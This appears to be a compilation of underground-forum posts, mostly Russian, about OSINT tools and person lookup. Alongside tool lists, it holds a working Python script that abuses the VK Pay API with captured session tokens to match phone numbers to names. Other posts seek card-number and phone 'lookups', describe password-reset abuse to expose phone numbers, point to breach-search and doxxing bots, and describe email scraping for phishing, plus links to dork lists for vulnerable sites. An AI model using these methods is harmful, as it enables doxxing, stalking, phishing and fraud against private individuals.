![osint.host](/proxy.php?image=https%3A%2F%2Fosint.host%2Fassets%2Ffavicon- pq7g549u.png&hash=dad0dfef82373de15bc27b1cdb21e831&return_error=1) osint.host
An independent body for military, strategic and geopolitical analysis to promote Indian interests and disseminate open source defence news.
defenceforumindia.com
Если есть чем дополнить список - пишите.
Anyone has some good updated list of OSINT tools
доброго вечера, у меня есть база номеров сша я хочу отсортить ее и разделить
валид( номера на которые я позвоню и человек поднимет) и невалид.
ищу чекер, сервис, человека кто будет делать данную работу.
гарант +
цену устанавливает сервис, а человек если чекает отталкиваемся от
возможностей, затрат на расходники, времени и других факторов.( индивидуально)
Основной функционал поисковой системы Snoop Project — выслеживать «username» в публичных данных по 4К+ сайтам, дополнительный функционал — различные OSINT плагины, в т. ч. разработанные на идеях и материалах обнаруженных уязвимостей в сервисах Яндекса (при участии в багбаунти программе), позволяющие работать с IP/GEO/Yandex-ом.
Snoop Project разработан на материалах исследовательской работы в области скрапинга публичных данных (собственная БД ). На данный момент Snoop выслеживает nickname(s) по ~4.2K интернет ресурсам в Full версии (платная лицензия) и по самым популярным ресурсам в Demo версии (бесплатно). Исходный код размещен на Github.
Подготовлены готовые сборки для OS GNU/Linux и Windows (для запуска ПО не требуются знания, либы или наличие Python) , из исходников собирается и в Termux/Android _.
_
Коллеги, подскажите как выяснить что за организация находится за конкретным IP адресом? Какие для этого есть методики (кроме whois )? Мне говорили, что это можно сделать через Zoominfo, но я зарегался на нём, получил триальный акк Zoominfolite и что-то ничего он мне не ищет. Есть несколько IP-адресов, имеющих доменное имя - по доменному имени ищет и показывает, по IP-адресу нет. Может нужен более продвинутый платный аккаунт? Тут, на форуме встречал упоминание ZoomInfo B2B IP Lookup.
Я так понимаю, что это типовая задача для интернет-маркетинга - выяснить кто пришёл с конкретного IP-адреса. Да и для тематики этого форума это актуально - сбрученые доступы, например.
Как это делается? Какие есть методики? Если тема уже обсуждалась - накидайте, пожалуйста, ссылок. Всё, что я нашёл:
https://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/69314/
но там ничего про связку IP-адрес -> компания.
Если не угадал с разделом для этого вопроса - извините и буду признателен, если укажете правильный.
У меня есть несколько трансформаций для censys и для каждой он требует один и тот же api ключ и secret. Как сразу ввести везде этот ключ?
Want recommendations for the best (accurate, fast, etc.) app to take images and translate language (especially Russian and Chinese). I know yandex want others.
Всем привет! Сегодня рассмотрим небольшой скрипт на Python, с помощью которого можем автоматизировать процесс получения имени и фамилии пользователя ВК по номеру телефона. Для этого нам нужен аккаунт ВК, в котором активирован услуга Vk Pay.
Заходим в Карты VK Pay, нажимаем Перевести, По номеру телефона, вводим любой номер на который зарегистрирован аккаунт VK, нажимаем Далее, и получаем имю и фамилию пользователя. При этом смотрим, какие запросы шлет браузер на сервер, где расположен API.
Как видим, браузер сделал POST запрос на uri <https://api.vkpay.io/visa- alias/p2p/options>, отправив при этом номер телефона как json {"phone":"+7 914 988-43-45"}.
Нам остается посмотреть что еще шлет браузер в headers.
Недолго думая, пишем такой вот скрипт на питоне.
Python:Copy to clipboard
import requests
headers ={
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0",
"Accept": "application/json, text/plain, */*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/json",
"X-App-Params": '{"vk_access_token_settings":"notify,friends,groups","vk_app_id":"71876443","vk_are_notifications_enabled":"0","vk_experiment":"eyIxNjE4Ijdfhf","vk_is_app_user":"1","vk_is_favorite":"0","vk_language":"ru","vk_platform":"desktop_web","vk_ref":"other","vk_ts":"1660982198","vk_user_id":"745256811","sign":"Y_6dfrtO4vnQl_qiTM2oiy-kONE20qaMq3V0qPBLxW-I"}',
"X-VKPAY-SESSIONID": "1N_q-5uytr",
"X-VKPAY-PLATFORM": "web",
"X-VK-Id": "745256811",
"X-VK-Hash": "fa0411fgrt0e0cf",
"X-VKApp-Token": "b7724b50-30ee-4df0-9ce7-f9b7a62644c6",
"X-VKPAY-VERSION": "2.0.0",
"X-MT-LVID": "e66f55d259jfhfkglf41e000dab3046d24",
"Content-Length": "28",
"Origin": "https://ea-miniapp.vkpay.io",
"Connection": "keep-alive",
"Referer": "https://ea-miniapp.vkpay.io/",
"Cookie": "_ga_R11HGFJPN3=GS1.1.1660982198.8.1.1660982282.51.0.0; _ga=GA1.1.1374728327.1657923647; tmr_reqNum=69; tmr_lvid=e66f5yfj76864c84f41e000dab3046d24; tmr_lvidTS=1657923646842",
'Sec-Fetch-Dest': "empty",
'Sec-Fetch-Mode': "cors",
'Sec-Fetch-Site': "same-site"
}
def get_name_from_vk(number):
url = "https://api.vkpay.io/visa-alias/p2p/options"
res = requests.post(url, headers=headers, json={"phone": number})
name = res.json()['additional_data']['user_name']
return name
if __name__ == '__main__:
print(get_name_from_vk('79149884345')
Вот и все!
Использование техник и приёмов OSINT для нетсталкинга:
Разведка на основе открытых источников (англ. Open-source intelligence, OSINT) — одна из разведывательных дисциплин. Включает в себя поиск, выбор и сбор разведывательной информации, полученной из общедоступных источников, и её анализ.
Click to expand...
Оверграунд](https://vk.com/netover) и Точки Сбора
Источник: https://github.com/netstalking-core/netstalking-osint
См. больше информации тут -> https://github.com/netstalking-core/
del
Сегодня как Вы уже поняли, речь пойдет про архивы, так что за работу!
Для начала думаю стоит рассказать для самых маленьких: что такое архивы, какую ценность они имеют в нашем деле и т.д
Архивы - это в большинстве своем сайты, которые позволяют сохранять странички интернета с нужной Вам информацией. К примеру очень популярный ресурс - WebArchive. Название говорит само за себя, «Архивирование веб-сайтов».
Наверное Вас мучает вопрос, на кой нам сдались эти архивы ?
Как показывает практика, у большинства юзеров в социальных сетях (например
ВКонтакте) странички созданы в 20хх-2019 годах. В подобных случаях это играет
нам на руку, ибо как я надеюсь Вы уже догадались, что есть вероятность их
нахождения в этих архивах.
Давайте пробежимся по парочке сайтов для ВКонтакте:
Теперь разберемся как ими пользоваться:
P.S Для теста я взял совершенно рандомного юзера + у него старый аккаунт (думаю логично, что если человек зарегистрировал аккаунт только вчера, то нет смысла его искать в архивах)
Click to expand...
Так выглядит страничка человека в настоящее время
Давайте прогоним его по архивам:
BigBookName
Вбиваем в поиске Bigbookname его ФИ (которые указаны в ВК)
Наблюдаем как раньше выглядела его страничка
В поле с основной информацией может находится номер телефона, настоящие ФИ,
дата рождения и так далее. Все в зависимости от ситуации, так что всегда всё
перепроверяйте.
Botsman
Здесь достаточно к ссылке https://botsman.org/people/ добавить цифровой айди пользователя:
Rupoisk / TopBd
Здесь аналогичная ситуация. К ссылке нужно просто добавить цифровой айди
https://rupoisk.pro/vk_user/id
https://topdb.ru/id
RuPoisk
TopBd
Немаловажным считаю рассказать про "архивы телеграма"
Все думаю слышали про сервисы вроде Telemetr'а (сервис для аналитики телеграм
каналов), TgStat и так далее
Если хорошо полазить по инфе, которую эти сервисы собирают для аналитики, то
можно узнать, что они могут индексировать посты в свою базу данных
Пример
Подскажите, есть ли способ проверить принадлежность номера СНИЛС конкретному
человеку(установочные данные и номер СНИЛС имеются)?
П.С.
Портал ФСС не подходит, т.к. просто проверяет корректность номера СНИЛС.
Кронос базы не подходят в силу ограниченности своей информации.
1. "word" is an exact match, works the same way as in Google.
2. hacking + employment + courses - Yandex perceives this way: If there is a
"+" before the word, it should be in the results, if there is no hacking +
before it, then it can be replaced with synonyms or other words that fit the
meaning.
3. The matrix -"2" - works like the "-" operator in Google. We exclude the
word from indexing.
4. buy tickets [krasnodar moscow] - this request form with square brackets
gives the output of this particular word order.
5. "Hacking " pentesting" - The symbol " " replaces" absolutely any word.
Examples of results :
hacking training pentesting
hacking osint pentesting
I am an osinter from Russia.
I have been investigating individuals and legal entities for more than five
years.
I have a huge number of tools and methods in my arsenal to search for any
information.
However, the main source is Yandex. This is an analogue of Google, the most
popular search engine in the CIS.
It, like Google, has many operators and tricks that simplify the search,
increase and refine indexing.
I am ready to teach you how to work with Yandex for $ 250.
Also look for my topic with a free lesson on Yandex.
I ask you not to raise the topic of politics, not to blame me for the actions
of politicians.
всем привет. есть вопрос. можно знать IP адрес и гео через номер телефона?
есть доступ gmail но ip адрес работает не то как я ожидал.
дайте инфо
спасибо
I came across this website called Ethyl . it's a Data Breach Search Engine
i wanted to see if anyone here had heard of it and could give us review about
it
I Found it through ethyl.sh
Let me know what you think...
Есть ВК (фейк Фамилия), есть Имя Отчество и первая буква Фамилии, есть ТГ, через ботов показывает какой то фейковый номер, по поиску ника тоже пусто, как найти злодея?
Недавно я нашел сайт, на котором размещен инструмент Ghunt, мне интересно поделиться здесь.
Веб-сайт: https://gmail-osint.activetk.jp
Инструмент: https://github.com/mxrch/GHunt
Международный розыск:
└ https://www.interpol.int/notice/search/wanted
Список террористов:
└ http://fedsfm.ru/documents/terrorists-catalog-portal-act
Федеральный розыск:
└ https://mvd.ru/wanted
Розыск сбежавших заключенных:
└ http://fsin.su/criminal/
Розыск ФССП:
└ http://fssprus.ru/iss/ip_search
Действительность паспорта:
└ http://сервисы.гувм.мвд.рф/info-service.htm?sid=2000
Проверка ИНН:
└ https://service.nalog.ru/inn.do
Кредиты:
└ https://app.exbico.ru/
Исполнительные производства:
└ http://fssprus.ru/iss/ip
Налоговые задолженности:
└ https://peney.net/
Залоги имущества:
└ https://www.reestr-zalogov.ru/state/index#
Банкротство:
└ https://bankrot.fedresurs.ru/
Участие в судопроизводстве:
└ https://bsr.sudrf.ru/bigs/portal.html
Решения мировых судей СПб:
└ https://mirsud.spb.ru/
Участие в бизнесе:
└ https://zachestnyibiznes.ru/
└ https://ogrn.site/
Поиск в соцсетях:
└ https://yandex.ru/people
└ https://pipl.com
Все методы howtofind бота в телеграме бесплатно:
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FjTr4V1Z2i1mmF6-QVI7gqTzQTozV5xp- BnIIulBrEbj0L3qn6-fkucQQvkHxr4zscfW5hQddo8wzWwBqvpxeOucDMIIsY0YSpGyGwlHZvVWiGz7Uh4btxRxeenTs9xXUwx0J2kESA1y3TtkufzRAACsMapVcORNn_4ft_u2V5enrITyWL9epvg3q2rbTrBGb5iZ0fxVUWBjWH3ey1Chddblaw6GAOeDHRWGgtUi50HRr6BK_l435thJE5Y2FI7uOKdzWoe- ZL3o71AbuGgB33zDtvyJCOlbozgxRTVWLJWoy2RQedwZKndjBxTIh1pOCq5XOc4urC-0SyCtAzL1ZIg.jpg&hash=2562aa5f74d8c194448d0728206d24d1&return_error=1)
You can view and join @HowToFindFree right away.
t.me
Без создания профиля в Instagram и подачи заявки на добавление в друзья, и при условии что в веб-архиве профиля нет.
Сегодня хочу обратить ваше внимание на личных список инструментов с открытым исходным кодом, заточенных под кибер-разведку из открытых источников, ну или же OSINT.
Это на самом деле очень крутой фреймворк, заточенный под OSINT. Довольно активно слежу за его продвижением в официальном Telegram-канале разработчиков, а его функционал действительно впечатляет. Правда у меня на данный момент есть его старая бесплатная версия, т.к на платную у меня, к сожалению, бюджет не резиновый) Да и плюсом большинство нужной мне информации я могу узнать совершенно бесплатно, не прибегая к платным сервисам, - максимум могу купить у Глаза Бога подписку на один день и хоть заOSINTиться по самые небалуй. Тем не менее, эту бесплатную версию я иногда использую, т.к здесь довольно удобное, функциональное и понятное меню. Ну а если вы всё же захотите купить подписку и пользоваться этим чудо-инструментом OSINT полноценно, то могу только сказать "Дерзайте!", ведь деньги, вложенные в данный проект, улучшат его ещё больше. Создателю хочу передать особую благодарность и удачи в развитии данного проекта!
Помню в комментариях под моей статьёй по анализу человека по его никнейму писали, что проект является пиратским и его создатель - злоумышленник, который скопировал базу данных BDfull Snoop. Хочу сказать сразу, что во-первых - я об этом просто не знал, а во-вторых - просто пользовался данным проектом и счёл его весьма эффективным по анализу никнейма, тем самым хотел просто рассказать о том, каким образом могут легко провести анализ по никнейму. Теперь буду осведомлён, конечно, но добавлю его в этот топ просто потому, что действительно активно пользовался им. Ну а так, создатель данного проекта действительно не прав в том, что нарушил авторские права Snoop Project.
Ещё один весьма неплохой и эффективный инструмент поиска по никнейму. Данное ПО предоставляет веб-интерфейс на локальном хосте для взаимодействия через браузер. В нём довольно понятно представлены сервисы, сайты и социальные сети в которых фигурирует искомый никнейм. Таким образом можно просто переходить по ссылкам и сопоставлять данные. В некоторых окошках уже могут иметься начальные данные пользователя, включая его имя и пункт Bio ("Биография", описание профиля). Как по мне, единственное, чего здесь не хватает, - это проверка никнейма по социальной сети ВКонтакте.
Да, бывало дело, что у пользователя можно найти и Skype, который своё пережил, но всё же, если у человека он имеется, то с помощью данного инструмента можно весьма неплохо его просканить. Версия инструмента, которая у меня сейчас, по прежней ссылке на GitHub оказалась уже недоступна, что я собственно узнал прям по ходу написания этой статьи, но тем не менее я очень сомневаюсь, что нельзя найти его копию, но уже от другого автора, поскольку, как я посмотрел, создатель этого проекта не обновлял его ещё 6 лет назад и что на том этапе инструмент даже не был доступен для пользования в Linux. Видимо, энтузиасты решили допилить данный проект, что я собственно очень даже поддерживаю. Вот что и называется сила открытого исходного кода.
автор user17
Google:
Dorks are search strings that uses advanced search operators for Intelligence X and Google to find information that is not readily available.
intelx.io
](https://github.com/iGotRootSRC/Dorkers)
Dorks for Google, Shodan and BinaryEdge. Contribute to iGotRootSRC/Dorkers development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F8c1be4b1d192f8ada453f5c7ae35d687a2029b3ad1831ba2b627f307cae77387%2Farimogi%2FGoogle- Dorks&hash=65c53b80e29fcc2052cee4f53ed0c4b5&return_error=1)
](https://github.com/arimogi/Google-Dorks)
I'm uploading dorks here. Contribute to arimogi/Google-Dorks development by creating an account on GitHub.
github.com
](https://github.com/abhijithb200/investigator)
An online handy-recon tool. Contribute to abhijithb200/investigator development by creating an account on GitHub.
github.com
Google Dorks | Google helps you to find Vulnerable Websites that Indexed in Google Search Results. Here is the latest collection of Google Dorks. A collection of 13.760 Dorks. Author: Jolanda de Ko...
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F2636a838761ef6c465dbe181f3d5cfc7d2e11b8fcc3ad27de8816470be8cd2d9%2Fthomasdesr%2FGoogle- dorks&hash=a94c012fb3ff615ce2af17a76faf8d4a&return_error=1)
prolly donn know :P ](https://github.com/thomasdesr/Google-dorks)
Common google dorks and others you prolly donn know :P - thomasdesr/Google- dorks
github.com
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F165498687%2F73ea0200-e6e0-11ea-8b73-dac0efc4117a&hash=cbcf14991c24edd1c8ed4df306d197c5&return_error=1)
into various sites ](https://github.com/aleedhillon/7000-Google-Dork-List)
7,000 Dorks for hacking into various sites. Contribute to aleedhillon/7000-Google-Dork-List development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F16c875f8bdc615bb2e6d416fe0ba264a75cab763ece897198d3813e38f123087%2FNoThrowForwardIt%2FSQLi- Dork-Repository&hash=de606dd30692097e21406476e0a86801&return_error=1)
for educational proposal ](https://github.com/unexpectedBy/SQLi-Dork- Repository)
Dorks Hacking Database for educational proposal. Contribute to NoThrowForwardIt/SQLi-Dork-Repository development by creating an account on GitHub.
github.com
![sguru.org](/proxy.php?image=https%3A%2F%2Fi0.wp.com%2Fsguru.org%2Fwp- content%2Fuploads%2F2016%2F06%2FGoogle-Dorks-Ultimate-Collection-For- Hackers.jpg%3Ffit%3D1024%252C538%26ssl%3D1&hash=6a967b3e7e7feacc11ce0aa9d9929304&return_error=1)
](https://sguru.org/ghdb-download-list-4500-google-dorks-free/)
Exploit websites vulnerabilities through Google using GHDB Google Dorks - List of 4500+ Google Dorks To Find Sites Vulnerabilities through Google Search Queries Alone.
sguru.org
Virus Total:
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F7a3b6a03a25475d06c5fb9984abc95c5996337f31f016570b8b423483772944d%2FNeo23x0%2Fvti- dorks&hash=18569907452d5c9554c6fb103e6db053&return_error=1)
Queries ](https://github.com/Neo23x0/vti-dorks)
Awesome VirusTotal Intelligence Search Queries. Contribute to Neo23x0/vti- dorks development by creating an account on GitHub.
github.com
Reddit:
![new.reddit.com](/proxy.php?image=https%3A%2F%2Fwww.redditstatic.com%2Fdesktop2x%2Fimg%2Ffavicon%2Fandroid- icon-192x192.png&hash=86904b79cb31db12ab7a77fe1a549518&return_error=1) new.reddit.com
Shodan:
](https://github.com/lothos612/shodan)
Shodan Dorks. Contribute to lothos612/shodan development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F28168376f9b20cd0c80be0f78a6515c838135613c71e002c22c601fe68d21398%2FIFLinfosec%2Fshodan- dorks&hash=0fbaf18e82eaa4aafebdf6d27b53bc03&return_error=1)
website ](https://github.com/IFLinfosec/shodan-dorks)
How to search on the shodan.io website. Contribute to IFLinfosec/shodan-dorks development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F479b8004d186631e9a49db100e183126d83d96ecef9b72372b736831c1b6a2c2%2Fhumblelad%2FShodan- Dorks&hash=303746f243a70a29495147a80329c5ff&return_error=1)
dorks collected from publicly available data. ](https://github.com/humblelad/Shodan-Dorks)
Dorks for shodan.io. Some basic shodan dorks collected from publicly available data. - humblelad/Shodan-Dorks
github.com
![github.com](/proxy.php?image=https%3A%2F%2Frepository- images.githubusercontent.com%2F183485617%2F11e50480-8398-11e9-99b8-ab08d69f85f5&hash=ada608e472e835e536d7437c0fcaa6ed&return_error=1)
interesting, funny, and depressing search queries to plug into shodan.io 👩💻 ](https://github.com/jakejarvis/awesome-shodan-queries)
🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩💻 - jakejarvis/awesome-shodan-queries
github.com
](https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks)
Contribute to AustrianEnergyCERT/ICS_IoT_Shodan_Dorks development by creating an account on GitHub.
github.com
Github:
![recruitin.net](/proxy.php?image=https%3A%2F%2Frecruitin.net%2Fassets%2Fimages%2Frecruitem- social-logo.png&hash=099a1379376a2e6c78c640466ba60bf4&return_error=1)
RecruitEm - Easily use Google to search profiles on LinkedIn, Google+, Twitter and more.
recruitin.net
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2Ff410a505ab88007c03d5d7d5064f72ef38fc57563313ea32182fa180de6bfa44%2Ftechgaun%2Fgithub- dorks&hash=e2c3dd5820dbbbd0f298975376b7ddba&return_error=1)
](https://github.com/techgaun/github-dorks)
Find leaked secrets via github search. Contribute to techgaun/github-dorks development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F0a175f3a7ce84c1d264074ab1dc4022cd8f77b946c71fbd31945f35a4ed9ddf8%2FH4CK3RT3CH%2Fgithub- dorks&hash=920a7c8f024227879bc48cfc90df09eb&return_error=1)
](https://github.com/H4CK3RT3CH/github-dorks)
Contribute to H4CK3RT3CH/github-dorks development by creating an account on GitHub.
github.com
![github.com](/proxy.php?image=https%3A%2F%2Fopengraph.githubassets.com%2F05c36ffbe1827f4314b5e1bdebef9cfd53aaf812e41623ad4170994cb96830f1%2Fjcesarstef%2Fghhdb- Github-Hacking-Database&hash=4c3b6e1cd8765b629f6d2bba96d755fb&return_error=1)
Database - My personal collection of Github Dorks to search for Confidential Information (Yes, it's a Github version of Google Dorks) ](https://github.com/jcesarstef/ghhdb-Github-Hacking-Database)
Github Hacking Database - My personal collection of Github Dorks to search for Confidential Information (Yes, it's a Github version of Google Dorks) - jcesarstef/ghhdb-Github-Hacking-Database
github.com
DuckDuckGo:
DuckDuckGo search engine. ](https://github.com/d34dfr4m3/goDuck)
A python script to perform dorks using DuckDuckGo search engine. - GitHub - d34dfr4m3/goDuck: A python script to perform dorks using DuckDuckGo search engine.
github.com
Сабж в теме.. Есть организация X, нужно пробить всех кто оставил отзыв на гугл картах, а если точнее их мыла. Скрин просто как пример
GEOINTInvestigations
Список инструментов для #geoint:
Карты
Просмотр улиц
Инструменты для карт
Списки кодов стран
и многое другое.
Video - Strumenti - Mappe ](https://github.com/CScorza/GEOINTInvestigation)
Intelligence tramite - Immagini - Video - Strumenti - Mappe - GitHub - CScorza/GEOINTInvestigation: Intelligence tramite - Immagini - Video - Strumenti - Mappe
github.com
cachedview.nl - check if a site has been cached or archived
Задача следующая :
Найти «ВК» аккаунт владельца данного телеграм канала, а также получить минимальные доказательства :
You can view and join @dr_msk right away.
t.me
Первый, кто решит кейс - получит бесплатное место в курсе [«Digital- Разведчик».](https://vc.ru/u/1311068-digital-razvedka/856015-kurs-digital- razvedchik)
Решение присылать сюда - @DigitaIScouter
Как вы получили номер своей учетной записи Facebook? В аккаунте Facebook имеется баланс или кредитный лимит. Какая технология была использована для получения этого числа? Кто-нибудь знает? Я хочу этому научиться.
Интересует пробив клиента ALTYN BANK по номеру карты
![exa.ai](/proxy.php?image=https%3A%2F%2Fexa.imgix.net%2Fog- image.png%2F&hash=d7c0af9537e9745c3a22e580f87dbcdd&return_error=1)
Find exactly what you are looking for
exa.ai
Введите целевой домен и получите быстрые ссылки для поиска страниц с ошибками SQL, резервными файлами, бэкдорами, открытыми перенаправлениями, файлами журналов и многим другим.
Доброго времени суток. Сегодня я хотел бы поговорить о методах поиска по электронной почте. Я покажу вам от базовых осинт решений до более продвинутых инструментов. Начнем с того, какая почта у нас имеется. Просмотр самого названия почты, так как оно может содержать разную информацию о цели, по типу фамилии и имени, или же даты рождения, или же никнейма цели. Также нужно обратить внимание на домен почты, дальше вы поймете, почему.
Ну, к примеру, возьмем почту с доменом mail.ru. Восстановления пароля https://account.mail.ru/recovery может показать часть номера телефона, а также часть резервной почты, если она была указана.
Можно пальцем в небо ткнуть и ходить по разным сервисам восстанавливать пароли, но для проверки, где зарегистрирована почта, есть софт на гитхабе, а также есть бот в Telegram.
Софт: https://github.com/megadose/holehe
Telegram бот: @holehe_s_bot
Хотел бы выделить еще восстановление одноклассников. Заходим на сайт
https://ok.ru/help/kak-vosstanovit-stranicu-v-ok, жмем "написать нам", далее
жмем "Владелец профиля умер" и пишем почту. Также там есть возможность
восстановления через номер телефона, но в данном случае мы говорим с вами о
поиске информации о электронной почте. Так вот, через восстановление
одноклассников можно получить имя, первую букву фамилии, город, год
регистрации, в некоторых случаях последние 2 цифры номера телефона.
Еще есть софт на гитхабе. Этот инструмент помогает автоматизировать
обнаружение чьего-либо номера телефона, злоупотребляя слабыми местами в
дизайне сброса пароля и общедоступными данными. Он поддерживает 3 основные
функции: "scrape" - очищает веб-сайты на наличие цифр номера телефона,
инициируя сброс пароля с использованием адреса электронной почты цели.
"generate" - создает список действительных телефонных номеров на основе
общедоступной информации о Плане нумерации телефонов страны. "bruteforce" -
перебирает список телефонных номеров и инициирует сброс пароля на разных веб-
сайтах, чтобы получить связанные с ними замаскированные электронные письма и
сопоставить их с адресом жертвы.
Софт: https://github.com/martinvigo/email2phonenumber
Дальше можно поискать почту через Google/Яндекс. Человек может указать ее как контактную информацию о себе и так далее.
"example@example.com" - используй адрес электронной почты, чтобы найти связанную с ним информацию. "site:example.com email" - ищет все страницы на сайте, которые могут содержать упоминания адресов электронной почты.
Перейдем к другим инструментам для поиска информации о электронной почте:
https://github.com/theahmadov/vector - покажет, в каких утечках есть почта.
https://epieos.com/ - инструмент, который упрощает обратный поиск адресов электронной почты и номеров телефонов для выявления профилей в социальных сетях.
https://castrickclues.com/ - похоже на Epieos, ищет не только по номеру телефона и почте, а также и по никнейму.
https://t.me/iscerberusbot - Сбор данных в открытых источниках.
https://t.me/UniversalSearchProBot - Хуже Церберуса, но все же бесплатный и неплохо собирает информацию.
https://t.me/daoz6qezlbot - банальный Глаз Бога поиск, также не только по почте.
https://t.me/scorpion_robot_bot - поиск по базам данных.
https://t.me/best_leak_search_bot - поиск по базам данных
В сети нашёл документ(Подписание Американо-украинских стратегических оборонных
рамок министром обороны Ллойдом - Остином и министром обороны Андреем Тарано).
Датируется 31 августом 2021 году( больше чем за полгода до боевых действий на
Украине).
Полностью файл закрепил, но хочу выделить несколько моментов :
"Обеспечение того чтобы двустороннее сотрудничество в области безопасности и
помощь США , эффективно помогали Украине противостоять российской агрессии, в
том числе посредством мощной программы обучения и учений "
"Осуществление реформ оборонного сектора в соответствии с принципами и
стандартами НАТО"
"Содействие реализации стратегии оборонной промышленности и реформ для
удовлетворения потребностей вооруженных сил Украины , включая повышение
прозрачности украинских оборонных закупок внедрение , реформ корпоративного
управления в Украине"
"Укрепление сотрудничества в области кибербезопасности в целях сдерживания
вредоносной киберпреступности в национальных системах безопасности , атрибуции
такой деятельности и эффективной защиты от противников"
Это всё означает, что США достаточно давно планировали конфликт с Россией.
Всё вышеописанное сбылось :
Были проведены учения на Украине
Были поставки оружия для "оборонной промышленности"
Все поставки были максимально прозрачны и афишированы
Были проведены многочисленные кибератаки на Российские ресурсы.
Это не политическая тема, а лишь пример практического применения OSINT
7 very good resources for Twitter investigations:
1. tweetbeaver.com
2. socialbearing.com
3. onemilliontweetmap.com
4. foller.me
5. allmytweets.net
6. followerwonk.com
7. tinfoleak.com
Пишут софт для осинта. Посоветуйте хорошие сайты, которые реально помогают искать инфу по номеру телефона, фотографии, ФИО и тп.
In many OSINT investigation scenarios, you'll want to find email addresses for a person or members of an organization. By identifying the target email, you can proceed to contact the target, send a phishing email, or even use one of the emails to social engineer the target from the same organization. For this we can use katana to scrape emails.
Bash:Copy to clipboard
user@host:~$ katana -u nasa.gov -f email
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/
projectdiscovery.io
[INF] Current katana version v1.0.1 (latest)
[INF] Started standard crawling for => https://nasa.gov
terms.@each.isSelected
events.@each.state
menu.listLinks.@each.url
arrays.@each.length
arrays.@each.isPending
arrays.@each.isFulfilled
arrays.@each.isExhausted
vandry@TZoNE.ORG
charles@karney.com
james@parall.ax
sstoo@gmail.com
jeeeyul@gmail.com
miodrag@restartit.me
robbiecloset@gmail.com
milanjanackovic@gmail.com
stefan@hotmail.rs
milanjanackovic@gmail.com
stefan@hotmail.rs
mail@nicolai.io
Hidden content for authorized users.
Open_Source_Intelligence_Techniques_Resources_for_Searching_and_Analyzing_Online_Information_by_Mich.pdf
anonfiles.com
Any good OSINT tools available to help find the end user of an email address?
Start.me'deki favori bağlantılardan detayları paylaşmak istiyorum.
https://start.me/p/rxRbpo/cti?locale=en
https://start.me/p/gy1BgY/osint-tools-and-resources
https://start.me/p/b5wb6e/coinkurd
Специалисты OSINT часто сталкиваются с необходимостью находить новые инструменты и ресурсы. Иногда поиск занимает много времени.
OSINT Inception - это сборник start.me страниц, созданный специалистами OSINT, где собраны ресурсы, которые могут быть полезны в работе.
Что вас может заинтересовать:
OSINT Inception: https://start.me/p/Pwy0X4/osint-inception
Which working OSINT free tools for using facebook and youtube can you advise
Hi,
If you look at the breakdown between amlbot and antinalysis percentages are all almost identical ?!
AMLBot check
**Antinalysis check:
**
it's look that Antinalysis use AMLbot API to provide the checking services for more privately using tor / btc / xmr payments? any recommendation of using Antinalysis or other tool ?
Чаты :
@osint_group
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.telegram- cdn.org%2Ffile%2FtZTVpxCqEkhTaVRxAahZtBRSPc3pKa4psdK8uki0lp-5DtfLJO7PVEuxjFoGWGYOJJGoMO3FVPU8gIXRfGYE7l4rrwUP- xzwhBQCJh3ao-fWhTsl3awC66ID1g51mLg9FFagHf_STzA1Hxy6dRf2T9oIdcHAIO- FzUVDYLIKeKi2uVxCMKHtNn- FZBcx26M8HDwbGdV3PCKSA4vFZehhSaqIWXbevuXr6Z49Wcm12OucHXVBRRBJ9wzR6OHP4kHK0nVbY_OKG_YSRUhQwX8ZWVAom90KtPHqBdi7A2DUVJ8IuZPthYxs2IBuYJ1KGcWgEbleRJ0Ahcpt4Nq3Rbx7_g.jpg&hash=1df37780f321c5c6a7bfbc4b932eb6d0&return_error=1)
About OSINT and investigation Channels: 🇬🇧 @HowToFind 🇷🇺 @HowToFind_RU Bots: 🇬🇧 @HowToFindBot 🇷🇺 @HowToFindRU_Bot
t.me
![t.me](/proxy.php?image=https%3A%2F%2Fcdn1.telegram- cdn.org%2Ffile%2FulAzWCeXJ_az6hsNo98Ud5Eu__k8e0qGf7S6fY9PRCFtiYvThgqiIQHuDPdy0JL9w3ASMpTz9bd7Vav9BY7pHmqucM5ugoXLyi7EH2_rRqfz2a5jR8YH8Lp9AkY0S9BQJ3zbmjumeAy1UYRagB0nMBCJLv7Ub7T80DLpVKt8nTknvcGhQHwg- wyjrI4NsDYmAWrbkoXnifw58A7bz309Ibzg2Iqfta4nQ0iWicBxVTcyalub_aHdvuTMJ9V1IQycPAT0p2aQC0xZ0KZm61Y95STuMwyABwiK2F1KFIkqmb7xYOsbyIcuWNIWnWnl- ZhMtxnbf_w1wnYurKoeZXmuAg.jpg&hash=c0986ce889cfa1e34ba27c7ac823dd8a&return_error=1)
Come for the challenges, stay for the tips. Find our fake Richard Stallman's location, pet, religion, education, etc. based on his social media accounts. Username is required. No tolerance for illegal content, NO DOXXING.
t.me
